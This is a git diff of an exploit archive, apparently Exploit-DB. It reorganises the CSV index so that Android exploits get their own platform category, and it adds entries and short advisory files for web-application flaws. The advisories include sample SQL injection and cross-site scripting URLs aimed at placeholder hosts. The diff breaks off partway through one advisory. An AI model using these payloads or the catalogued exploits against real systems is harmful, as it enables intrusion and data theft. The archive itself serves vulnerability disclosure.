diff --git a/files.csv b/files.csv index 456318ba4..f22d6ba76 100755 --- a/files.csv +++ b/files.csv @@ -4973,7 +4973,7 @@ id,file,description,date,author,platform,type,port 5339,platforms/php/webapps/5339.php,"Nuked-Klan <= 1.7.6 - Multiple Vulnerabilities Exploit",2008-04-01,"Charles Fol",php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 Remote SQL Injection Vulnerability",2008-04-01,DreamTurk,php,webapps,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service Exploit",2008-04-01,Ray,windows,dos,0 -5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510 +5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP Denial of Service Exploit",2008-04-02,muts,windows,dos,0 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability",2008-04-02,NoGe,php,webapps,0 @@ -8940,7 +8940,7 @@ id,file,description,date,author,platform,type,port 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - Remote SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup Vulnerability",2009-08-18,alnjm33,php,webapps,0 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0 -9477,platforms/linux/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,linux,local,0 +9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,android,local,0 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (simple ver)",2009-08-24,"INetCop Security",linux,local,0 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0 @@ -13375,7 +13375,7 @@ id,file,description,date,author,platform,type,port 15420,platforms/windows/dos/15420.c,"Avast! Internet Security aswtdi.sys 0day Local DoS PoC",2010-11-04,"Nikita Tarakanov",windows,dos,0 15421,platforms/windows/remote/15421.html,"Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit",2010-11-04,ryujin,windows,remote,0 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0 -15423,platforms/hardware/remote/15423.html,"Android 2.0-2.1 Reverse Shell Exploit",2010-11-05,"MJ Keith",hardware,remote,0 +15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 15426,platforms/windows/dos/15426.txt,"Adobe Flash ActionIf Integer Denial of Service Vulnerability",2010-11-05,"Matthew Bergin",windows,dos,0 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - (0day) Remote Directory Traversal Vulnerability",2010-11-05,"Yakir Wizman",windows,remote,0 15428,platforms/multiple/dos/15428.rb,"Avidemux <= 2.5.4 - Buffer Overflow Vulnerability",2010-11-05,The_UnKn@wn,multiple,dos,0 @@ -13471,7 +13471,7 @@ id,file,description,date,author,platform,type,port 15543,platforms/php/webapps/15543.txt,"Chameleon Social Networking Software Persistent XSS Vulnerability",2010-11-15,Dr-mosta,php,webapps,0 15544,platforms/asp/webapps/15544.txt,"Web Wiz NewsPad Express Edition 1.03 Database File Disclosure Vulnerability",2010-11-15,keracker,asp,webapps,0 15545,platforms/php/webapps/15545.txt,"Nuked-Klan Module Boutique Blind SQL Injection",2010-11-15,[AR51]Kevinos,php,webapps,0 -15548,platforms/hardware/remote/15548.html,"Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",hardware,remote,0 +15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0 15549,platforms/php/webapps/15549.txt,"Joomla Component (com_alfurqan15x) SQL Injection Vulnerability",2010-11-15,kaMtiEz,php,webapps,0 15550,platforms/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent XSS via Profile Customization",2010-11-16,MaXe,php,webapps,0 15551,platforms/asp/webapps/15551.txt,"BPAffiliate Affiliate Tracking Authentication Bypass Vulnerability",2010-11-16,v3n0m,asp,webapps,0 @@ -13912,8 +13912,8 @@ id,file,description,date,author,platform,type,port 16095,platforms/linux/dos/16095.pl,"Terminal Server Client .rdp Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 16096,platforms/php/webapps/16096.txt,"redaxscript 0.3.2 - Multiple Vulnerabilities",2011-02-02,"High-Tech Bridge SA",php,webapps,0 16097,platforms/php/webapps/16097.txt,"Zikula CMS <= 1.2.4 CSRF Vulnerability",2011-02-02,"Aung Khant",php,webapps,0 -16098,platforms/hardware/local/16098.c,"Android 1.x/2.x HTC Wildfire Local Root Exploit",2011-02-02,"The Android Exploid Crew",hardware,local,0 -16099,platforms/hardware/local/16099.c,"Android 1.x/2.x Local Root Exploit",2011-02-02,"The Android Exploid Crew",hardware,local,0 +16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0 +16099,platforms/android/local/16099.c,"Android 1.x/2.x - Local Root Exploit",2011-02-02,"The Android Exploid Crew",android,local,0 16100,platforms/hardware/remote/16100.txt,"Tandberg E, EX and C Series Endpoints Default Credentials for Root Account",2011-02-02,"Cisco Security",hardware,remote,0 16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - Buffer Overflow (PASV) Exploit",2011-02-03,modpr0be,windows,remote,0 16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 - (details.php) Remote SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0 @@ -14748,7 +14748,7 @@ id,file,description,date,author,platform,type,port 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)",2011-03-14,Rh0,windows,local,0 16972,platforms/hardware/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,hardware,remote,0 16973,platforms/linux/dos/16973.c,"Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0 -16974,platforms/hardware/remote/16974.html,"Android 2.0 ,2.1, 2.1.1 WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",hardware,remote,0 +16974,platforms/android/remote/16974.html,"Android 2.0 ,2.1, 2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple XSS Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 .lst Buffer Overflow Exploit (SEH)",2011-03-14,h1ch4m,windows,local,0 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 .fcd Buffer Overflow Exploit",2011-03-14,h1ch4m,windows,local,0 @@ -15743,7 +15743,7 @@ id,file,description,date,author,platform,type,port 18159,platforms/linux/dos/18159.py,"XChat Heap Overflow DoS",2011-11-25,"Jane Doe",linux,dos,0 18162,platforms/linux/shellcode/18162.c,"Linux/MIPS - execve /bin/sh - 48 bytes",2011-11-27,rigan,linux,shellcode,0 18163,platforms/linux/shellcode/18163.c,"Linux/MIPS - add user(UID 0) with password - 164 bytes",2011-11-27,rigan,linux,shellcode,0 -18164,platforms/hardware/webapps/18164.php,"Android 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",hardware,webapps,0 +18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin 0day",2011-11-28,Alberto_García_Illera,php,webapps,0 @@ -15946,7 +15946,7 @@ id,file,description,date,author,platform,type,port 18442,platforms/multiple/remote/18442.html,"Apache httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote,0 18443,platforms/php/webapps/18443.txt,"swDesk Multiple Vulnerabilities",2012-02-01,"Red Security TEAM",php,webapps,0 18444,platforms/php/webapps/18444.txt,"sit! support incident tracker 3.64 - Multiple Vulnerabilities",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -18446,platforms/hardware/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",hardware,remote,0 +18446,platforms/android/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",android,remote,0 18447,platforms/asp/webapps/18447.txt,"MailEnable Webmail Cross-Site Scripting Vulnerability",2012-01-13,"Sajjad Pourali",asp,webapps,0 18448,platforms/windows/remote/18448.rb,"Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",2012-02-02,metasploit,windows,remote,0 18449,platforms/windows/remote/18449.rb,"Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",2012-02-02,metasploit,windows,remote,0 @@ -16096,7 +16096,7 @@ id,file,description,date,author,platform,type,port 18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal Vulnerability",2012-03-19,rgod,jsp,webapps,0 18628,platforms/windows/dos/18628.py,"PeerFTP Server <= 4.01 - Remote Crash PoC",2012-03-20,localh0t,windows,dos,0 18629,platforms/windows/dos/18629.py,"Tiny Server <= 1.1.9 HTTP HEAD DoS",2012-03-20,"brock haun",windows,dos,0 -18630,platforms/hardware/dos/18630.txt,"Android FTPServer 1.9.0 - Remote DoS",2012-03-20,G13,hardware,dos,0 +18630,platforms/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote DoS",2012-03-20,G13,android,dos,0 18631,platforms/php/webapps/18631.txt,"OneForum (topic.php) SQL Injection Vulnerability",2012-03-20,"Red Security TEAM",php,webapps,0 18632,platforms/php/webapps/18632.txt,"OneFileCMS - Failure to Restrict URL Access",2012-03-20,"Abhi M Balakrishnan",php,webapps,0 18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 Tiff Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 @@ -17219,7 +17219,7 @@ id,file,description,date,author,platform,type,port 19886,platforms/multiple/remote/19886.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (1)",2000-05-02,FuSyS,multiple,remote,0 19887,platforms/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,multiple,remote,0 19888,platforms/multiple/remote/19888.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (3)",2002-01-18,g463,multiple,remote,0 -19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability",2000-05-02,"rain forest puppy",windows,remote,0 +19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 - NetBIOS NULL Name Vulnerability",2000-05-02,"rain forest puppy",windows,remote,0 19890,platforms/cgi/remote/19890.txt,"ultrascripts ultraboard 1.6 - Directory Traversal vulnerability",2000-05-03,"Rudi Carell",cgi,remote,0 19891,platforms/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (1)",1999-05-31,"Hugo Breton",linux,remote,0 19892,platforms/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6,tcpdump 3.4/3.5 alpha DNS Decode Vulnerability (2)",1999-05-31,scut,linux,remote,0 @@ -20460,7 +20460,7 @@ id,file,description,date,author,platform,type,port 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability",2003-10-15,"Oliver Karow",linux,dos,0 23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 Integer Overflow",2012-12-09,beford,windows,dos,0 23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability",2003-10-25,Adik,windows,remote,0 -23248,platforms/arm/dos/23248.txt,"Android Kernel 2.6 - Local DoS Crash PoC",2012-12-09,G13,arm,dos,0 +23248,platforms/android/dos/23248.txt,"Android Kernel 2.6 - Local DoS Crash PoC",2012-12-09,G13,android,dos,0 23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent XSS",2012-12-09,VipVince,php,webapps,0 23250,platforms/hardware/webapps/23250.txt,"Cisco DPC2420 Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",hardware,webapps,0 23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Local Root",2012-12-09,"Larry W. Cashdollar",linux,local,0 @@ -25972,7 +25972,7 @@ id,file,description,date,author,platform,type,port 28954,platforms/php/webapps/28954.txt,"Bitweaver 1.x fisheye/list_galleries.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow SEH",2013-10-14,metacom,windows,local,0 28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4, 0.8.2, 0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 -28957,platforms/hardware/dos/28957.txt,"Android Zygote Socket Vulnerability Fork bomb Attack",2013-10-14,"Luca Verderame",hardware,dos,0 +28957,platforms/android/dos/28957.txt,"Android Zygote - Socket Vulnerability Fork bomb Attack",2013-10-14,"Luca Verderame",android,dos,0 28959,platforms/php/webapps/28959.txt,"Wordpress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 28960,platforms/php/webapps/28960.py,"aMSN 0.98.9 Web App - Multiple Vulnerabilities",2013-10-14,drone,php,webapps,80 28962,platforms/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console Java Execution",2013-10-14,metasploit,multiple,remote,0 @@ -28122,8 +28122,8 @@ id,file,description,date,author,platform,type,port 31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0 31305,platforms/linux/dos/31305.c,"Linux 3.4+ recvmmsg x32 compat - Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0 31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone - Remote Ping Denial of Service Vulnerability",2008-02-26,sipherr,hardware,dos,0 -31307,platforms/hardware/dos/31307.py,"Android Web Browser - GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0 -31308,platforms/hardware/dos/31308.html,"Android Web Browser - BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0 +31307,platforms/android/dos/31307.py,"Android Web Browser - GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",android,dos,0 +31308,platforms/android/dos/31308.html,"Android Web Browser - BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",android,dos,0 31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow Vulnerability",2008-02-27,"Will Drewry",linux,remote,0 31310,platforms/windows/dos/31310.txt,"Trend Micro OfficeScan - Buffer Overflow Vulnerability and Denial of Service Vulnerability",2008-02-27,"Luigi Auriemma",windows,dos,0 31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross Site Scripting Vulnerability",2008-02-28,"Richard Brain",hardware,remote,0 @@ -29428,6 +29428,7 @@ id,file,description,date,author,platform,type,port 32665,platforms/php/webapps/32665.txt,"Kloxo 6.1.18 Stable - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778 32666,platforms/php/webapps/32666.txt,"Kloxo-MR 6.5.0 - CSRF Vulnerability",2014-04-02,"Necmettin COSKUN",php,webapps,7778 32667,platforms/hardware/webapps/32667.pdf,"NetPilot/Soho Blue Router 6.1.15 - Privilege Escalation",2014-04-02,"Richard Davy",hardware,webapps,80 +32668,platforms/php/webapps/32668.txt,"CMS Made Simple 1.11.10 - Multiple XSS Vulnerabilities",2014-04-03,"Blessen Thomas",php,webapps,0 32669,platforms/php/webapps/32669.txt,"phpcksec 0.2 'phpcksec.php' Cross Site Scripting Vulnerability",2008-12-17,ahmadbady,php,webapps,0 32670,platforms/php/webapps/32670.txt,"Oracle Identity Manager 11g R2 SP1 (11.1.2.1.0) - Unvalidated Redirects",2014-04-03,"Giuseppe D'Amore",php,webapps,0 32671,platforms/php/webapps/32671.txt,"DO-CMS 3.0 'p' Parameter Multiple SQL Injection Vulnerabilities",2008-12-18,"crash over",php,webapps,0 @@ -29450,6 +29451,7 @@ id,file,description,date,author,platform,type,port 32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0 32689,platforms/php/webapps/32689.txt,"NPDS Versions Prior to 08.06 Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0 +32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - (libaudiofile) 'msadpcm.c' WAV File Processing Buffer Overflow Vulnerability",2008-12-30,"Anton Khirnov",linux,remote,0 32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/MMS Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0 32693,platforms/php/local/32693.php,"suPHP <= 0.7 'suPHP_ConfigPath' Safe Mode Restriction-Bypass Vulnerability",2008-12-31,Mr.SaFa7,php,local,0 32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (1)",2009-01-01,"Jeremy Brown",osx,dos,0 @@ -29457,9 +29459,12 @@ id,file,description,date,author,platform,type,port 32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0 +32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure Vulnerability",2009-01-05,"Aditya K Sood",windows,remote,0 32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0 32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80 32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80 +32703,platforms/hardware/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,hardware,webapps,0 +32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulnerability",2014-04-05,LiquidWorm,windows,dos,0 32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 @@ -29471,3 +29476,18 @@ id,file,description,date,author,platform,type,port 32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0 32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0 32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0 +32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities (XSS & CSRF)",2014-04-07,"Mayank Kapoor",php,webapps,0 +32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0 +32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 'login.php' SQL Injection Vulnerability",2009-01-14,darkjoker,php,webapps,0 +32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector Directory Traversal",2014-04-07,metasploit,windows,remote,8080 +32726,platforms/linux/dos/32726.txt,"Ganglia gmetad <= 3.0.6 'process_path()' Remote Stack Buffer Overflow Vulnerability",2009-01-15,"Spike Spiegel",linux,dos,0 +32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 /modules/blog/index.php Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 +32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 /modules/rss/handler_image.php i Parameter XSS",2009-01-15,waraxe,php,webapps,0 +32729,platforms/asp/webapps/32729.txt,"LinksPro 'OrderDirection' Parameter SQL Injection Vulnerability",2009-01-15,Pouya_Server,asp,webapps,0 +32730,platforms/asp/webapps/32730.txt,"Active Bids search.asp search Parameter XSS",2009-01-15,Pouya_Server,asp,webapps,0 +32731,platforms/asp/webapps/32731.txt,"Active Bids search.asp search Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 +32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 'SearchKeywords' Parameter SQL Injection Vulnerability",2009-01-15,Pouya_Server,php,webapps,0 +32733,platforms/php/webapps/32733.txt,"w3bcms 'admin/index.php' SQL Injection Vulnerability",2009-01-15,Pouya_Server,php,webapps,0 +32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 User Enumeration Weakness and Cross Site Scripting Vulnerability",2009-01-16,"clément Oudot",cgi,webapps,0 +32735,platforms/asp/webapps/32735.txt,"Blog Manager inc_webblogmanager.asp ItemID Parameter SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0 +32736,platforms/asp/webapps/32736.txt,"Blog Manager inc_webblogmanager.asp CategoryID Parameter XSS",2009-01-16,Pouya_Server,asp,webapps,0 diff --git a/platforms/hardware/dos/18630.txt b/platforms/android/dos/18630.txt similarity index 100% rename from platforms/hardware/dos/18630.txt rename to platforms/android/dos/18630.txt diff --git a/platforms/arm/dos/23248.txt b/platforms/android/dos/23248.txt similarity index 100% rename from platforms/arm/dos/23248.txt rename to platforms/android/dos/23248.txt diff --git a/platforms/hardware/dos/28957.txt b/platforms/android/dos/28957.txt similarity index 100% rename from platforms/hardware/dos/28957.txt rename to platforms/android/dos/28957.txt diff --git a/platforms/hardware/dos/31307.py b/platforms/android/dos/31307.py similarity index 100% rename from platforms/hardware/dos/31307.py rename to platforms/android/dos/31307.py diff --git a/platforms/hardware/dos/31308.html b/platforms/android/dos/31308.html similarity index 100% rename from platforms/hardware/dos/31308.html rename to platforms/android/dos/31308.html diff --git a/platforms/hardware/local/16098.c b/platforms/android/local/16098.c similarity index 100% rename from platforms/hardware/local/16098.c rename to platforms/android/local/16098.c diff --git a/platforms/hardware/local/16099.c b/platforms/android/local/16099.c similarity index 100% rename from platforms/hardware/local/16099.c rename to platforms/android/local/16099.c diff --git a/platforms/linux/local/9477.txt b/platforms/android/local/9477.txt similarity index 100% rename from platforms/linux/local/9477.txt rename to platforms/android/local/9477.txt diff --git a/platforms/hardware/remote/15423.html b/platforms/android/remote/15423.html similarity index 100% rename from platforms/hardware/remote/15423.html rename to platforms/android/remote/15423.html diff --git a/platforms/hardware/remote/15548.html b/platforms/android/remote/15548.html similarity index 100% rename from platforms/hardware/remote/15548.html rename to platforms/android/remote/15548.html diff --git a/platforms/hardware/remote/16974.html b/platforms/android/remote/16974.html similarity index 100% rename from platforms/hardware/remote/16974.html rename to platforms/android/remote/16974.html diff --git a/platforms/hardware/remote/18446.html b/platforms/android/remote/18446.html similarity index 100% rename from platforms/hardware/remote/18446.html rename to platforms/android/remote/18446.html diff --git a/platforms/hardware/webapps/18164.php b/platforms/android/webapps/18164.php similarity index 100% rename from platforms/hardware/webapps/18164.php rename to platforms/android/webapps/18164.php diff --git a/platforms/asp/webapps/32729.txt b/platforms/asp/webapps/32729.txt new file mode 100755 index 000000000..e17b0c7c3 --- /dev/null +++ b/platforms/asp/webapps/32729.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/33305/info + +LinksPro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[Path]/default.asp?QS=True&OrderDirection='[SQL]&OrderField=codefixerlp_tblLink_flddateadded + diff --git a/platforms/asp/webapps/32730.txt b/platforms/asp/webapps/32730.txt new file mode 100755 index 000000000..cef735c46 --- /dev/null +++ b/platforms/asp/webapps/32730.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/33306/info + + +Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[Path]/search.asp?search=&submit=%3E + +http://www.example.com/[Path]/search.asp?search=>">alert(1369)%3B&submit=%3E \ No newline at end of file diff --git a/platforms/asp/webapps/32731.txt b/platforms/asp/webapps/32731.txt new file mode 100755 index 000000000..d2f08f2f9 --- /dev/null +++ b/platforms/asp/webapps/32731.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33306/info + +Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[Path]/search.asp?search='[SQL]&submit=%3E \ No newline at end of file diff --git a/platforms/asp/webapps/32735.txt b/platforms/asp/webapps/32735.txt new file mode 100755 index 000000000..d0ffa608d --- /dev/null +++ b/platforms/asp/webapps/32735.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33314/info + +DMXReady Blog Manager is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[Path]/inc_webblogmanager.asp?CategoryID=121&ItemID=[SQL]&action=view \ No newline at end of file diff --git a/platforms/asp/webapps/32736.txt b/platforms/asp/webapps/32736.txt new file mode 100755 index 000000000..8ba9d39d2 --- /dev/null +++ b/platforms/asp/webapps/32736.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33314/info + +DMXReady Blog Manager is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[Path]/inc_webblogmanager.asp?CategoryID=>">alert(1369)%3B&ItemID=1&action=refer \ No newline at end of file diff --git a/platforms/cgi/webapps/32734.txt b/platforms/cgi/webapps/32734.txt new file mode 100755 index 000000000..d1358da16 --- /dev/null +++ b/platforms/cgi/webapps/32734.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/33312/info + +LemonLDAP:NG is prone to a user-enumeration weakness and a cross-site scripting vulnerability. + +A remote attacker can exploit the user-enumeration weakness to enumerate valid usernames and then perform brute-force attacks; other 